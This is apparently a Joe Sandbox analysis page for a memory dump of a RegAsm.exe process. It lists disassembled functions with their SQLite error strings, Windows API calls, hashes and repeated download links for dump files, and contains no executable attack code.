ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19CFEC42
database corruption, xrefs: 19CFEC4C
CREATE , xrefs: 19CFEBFF

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$CREATE $database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1360532505
Opcode ID: d30f01acbd816bcda1537a319bc0a4be82d66ecbf5882a9cee8043e688863f68
Instruction ID: d6de480c052ce5977406adba5bdbc8f06035082353b1022a0977e39ab7d08e89
Opcode Fuzzy Hash: d30f01acbd816bcda1537a319bc0a4be82d66ecbf5882a9cee8043e688863f68
Instruction Fuzzy Hash: B7313A635083C16AD7114A59FC40BE27F95AF4561AF2C44BBF8C98B6C2E726B580CB71

Uniqueness

Uniqueness Score: -1.00%

Function 19C57050 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

Strings

invalid, xrefs: 19C5706F
out of memory, xrefs: 19C57059, 19C570A2
API call with %s database connection pointer, xrefs: 19C57074
bad parameter or other API misuse, xrefs: 19C57083

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: API call with %s database connection pointer$bad parameter or other API misuse$invalid$out of memory
API String ID: 0-453588374
Opcode ID: f4ac6aaebf00b37a441fb3ff0417a8df8add844e45dab74c970fdb5eab15a301
Instruction ID: c0186d8cfe9a8dd240eb41856e8ef7812b777596d73b15c6b66ed3cdc43214bc
Opcode Fuzzy Hash: f4ac6aaebf00b37a441fb3ff0417a8df8add844e45dab74c970fdb5eab15a301
Instruction Fuzzy Hash: 1B312976B0035097FF144625FC0AB5B23965BC0705FAD4429E4CBD66C2E625E9C7C399

Uniqueness

Uniqueness Score: -1.00%

Function 19CD93A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19CD9455, 19CD9499
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19CD9446, 19CD948A
database corruption, xrefs: 19CD9450, 19CD9494

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 2af4442aa3683f264bbbd869d6ca98b3a12813b9522da786c95dd19517c69d7f
Instruction ID: 48a4075663f431530496795cd6f8d0b230446556070f9077f6945307ada553b2
Opcode Fuzzy Hash: 2af4442aa3683f264bbbd869d6ca98b3a12813b9522da786c95dd19517c69d7f
Instruction Fuzzy Hash: 0E314E7A6447504BC314DF28E890AF3BFF29F45711B98846DE6C687786D722E841C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 19C64F40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 91COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19C64F71, 19C65002
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C64F62, 19C64FF3
database corruption, xrefs: 19C64F6C, 19C64FFD

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 6ce686f699a18189b12ca0c1394c2af77f3c7cb727404c459d4fb2d7f57df4bf
Instruction ID: 419f1b1692c0ae8a43a6cff4fd54235fb2ddc06d97ed7d85ee62302fbe9dae45
Opcode Fuzzy Hash: 6ce686f699a18189b12ca0c1394c2af77f3c7cb727404c459d4fb2d7f57df4bf
Instruction Fuzzy Hash: FF31E3766045416BC301DB29ED80BA5BFF0BF55312F4C8266F498CBB82E725E960DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 19C31C60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19C31D4B
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C31D3C
unknown database: %s, xrefs: 19C31CBD
misuse, xrefs: 19C31D46

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
API String ID: 0-142545749
Opcode ID: f5e4e4bfa5fbd52ff9b9f86e1dad682af2a5c19d772fa4e8816ac6a24d6ced03
Instruction ID: b26b249c86ced07987afe7f320155e17de507c9cf1e6bf2ba9be3fdabcc4782f
Opcode Fuzzy Hash: f5e4e4bfa5fbd52ff9b9f86e1dad682af2a5c19d772fa4e8816ac6a24d6ced03
Instruction Fuzzy Hash: 472135B65007806FE7119B25FC84F977AB9AFC235AF8C4528F898972C1D720A6018772

Uniqueness

Uniqueness Score: -1.00%

Function 19C63FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19C6408C, 19C640B7
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C6407D, 19C640A8
database corruption, xrefs: 19C64087, 19C640B2

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 81ec87a87c4acbf9d6ac514619dabd4b9f1c524d4ee6cd3951b7f2cbf6deef0e
Instruction ID: 8a7f5c3b7b632add197b464c9effa074425f9797cdcd50a227a1bba7f9c8d530
Opcode Fuzzy Hash: 81ec87a87c4acbf9d6ac514619dabd4b9f1c524d4ee6cd3951b7f2cbf6deef0e
Instruction Fuzzy Hash: C021C4B7A002215BC700DE18EC815EBBBE0EB84A51F994536FD84D7341E629D55987E2

Uniqueness

Uniqueness Score: -1.00%

Function 19CD9290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19CD92AB, 19CD9339
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19CD929C, 19CD932A
database corruption, xrefs: 19CD92A6, 19CD9334

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: bd45f690bab9c6fc18452c4edcac5123307500241500cd1fc2152e4be7b93de3
Instruction ID: 66ca2763dc880902e752a4c4bce9c3361de1f4dd3677ba60a07b410f77982ddc
Opcode Fuzzy Hash: bd45f690bab9c6fc18452c4edcac5123307500241500cd1fc2152e4be7b93de3
Instruction Fuzzy Hash: 0B214C3A544B9057C321DF28EC80AF3BFF29F15300B9D855DE2D287796E222E4418791

Uniqueness

Uniqueness Score: -1.00%

Function 19C433C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 19C433D6

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
API String ID: 0-1935849370
Opcode ID: fbd4249a72a4bb95683dc86accfb6193df46224fd5b9bba078cdffd8ec3f9adb
Instruction ID: 8edca01e5fdf026da0d365f33c44fb83ec64ee48e79443c99470aedca48f7656
Opcode Fuzzy Hash: fbd4249a72a4bb95683dc86accfb6193df46224fd5b9bba078cdffd8ec3f9adb
Instruction Fuzzy Hash: 7D01C0797002168BD602DF19E800B8AB3E9AFC5311F59C166F6408B280EBB4A5878BA1

Uniqueness

Uniqueness Score: -1.00%

Function 19DD5BC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A7960C1F,?,?,00000000,19E2D1CB,000000FF,?,19DD5B30,?,?,19DD5ADF,?), ref: 19DD5BF6
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 19DD5C08
FreeLibrary.KERNEL32(00000000,?,?,00000000,19E2D1CB,000000FF,?,19DD5B30,?,?,19DD5ADF,?), ref: 19DD5C2A

Strings

CorExitProcess, xrefs: 19DD5C00
mscoree.dll, xrefs: 19DD5BEF

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4ea5e28d4d92aa3fc16c145b38598ed33cdb459d54028a52636e9dc9252820a7
Instruction ID: c0bccd7a56dbe52e639127ed278fd883d08adf071b80927efd2409bada09b35a
Opcode Fuzzy Hash: 4ea5e28d4d92aa3fc16c145b38598ed33cdb459d54028a52636e9dc9252820a7
Instruction Fuzzy Hash: 8A016271D14669EFDB029FA4CD48FAEBBFCFB04711F440925E815E26C0DB799900CA90

Uniqueness

Uniqueness Score: -1.00%

Function 19D46A20 Relevance: 8.0, APIs: 5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0607bd2e820776d54d4b8396588ae4674f5ac5b2ea251b9ffe507f8c060b34b2
Instruction ID: 6ab582293b2a86f74db48f4433d6b99c7856f5178082afacac15c1d186a13ff1
Opcode Fuzzy Hash: 0607bd2e820776d54d4b8396588ae4674f5ac5b2ea251b9ffe507f8c060b34b2
Instruction Fuzzy Hash: FA02BEB0904356CFD701DF24D88871BBBE8BF54304F58452DE88A97B81EB75E958CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19CAAF80 Relevance: 7.8, APIs: 5, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1664afa36435bdd302c2a42581a47b387a9d591d291151940b8aabc1163cf5ab
Instruction ID: 50f712e2d099841c08b30777a3d09b8365c0253348d67f991a2ea5b1c97b12f6
Opcode Fuzzy Hash: 1664afa36435bdd302c2a42581a47b387a9d591d291151940b8aabc1163cf5ab
Instruction Fuzzy Hash: 27A19DB1D006A2DBD752AF75E88CA1B377CBF10345F084525E84AD2381EB35E964CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 19D473C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

fts5: syntax error near "%.*s", xrefs: 19D4751C

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: fts5: syntax error near "%.*s"
API String ID: 0-498961494
Opcode ID: b867c71f9b7e296c67981485cbde69befad1e556dc9b9dc5498eecafff9219eb
Instruction ID: d9cbc92b8d90c62fad5419b292d3aac6994050abf19a1a3b853ca4be30d0212c
Opcode Fuzzy Hash: b867c71f9b7e296c67981485cbde69befad1e556dc9b9dc5498eecafff9219eb
Instruction Fuzzy Hash: 16B1DDB4804391DFD711CF24C884B5BBBE8AF54348F69881DE8C98BA80D775E585CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 19C3F7F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

integer overflow, xrefs: 19C3F8ED

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: integer overflow
API String ID: 0-1678498654
Opcode ID: 778bc7451a8fa0bd9b06e9cdefbf9262ac7bc5765070accd72ecbf8c6d1044e8
Instruction ID: 337e62a4ecc42f1b2b95e2a23049acd527fb60a43abbb62fe6d9adf544217526
Opcode Fuzzy Hash: 778bc7451a8fa0bd9b06e9cdefbf9262ac7bc5765070accd72ecbf8c6d1044e8
Instruction Fuzzy Hash: 53110076C047126BEB02AF24FC00B8A37A15F17321F8D5B99E4D91A1E2EB6196C4C3D3

Uniqueness

Uniqueness Score: -1.00%

Function 19D26180 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 216COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19D26396
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D26387
database corruption, xrefs: 19D26391

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
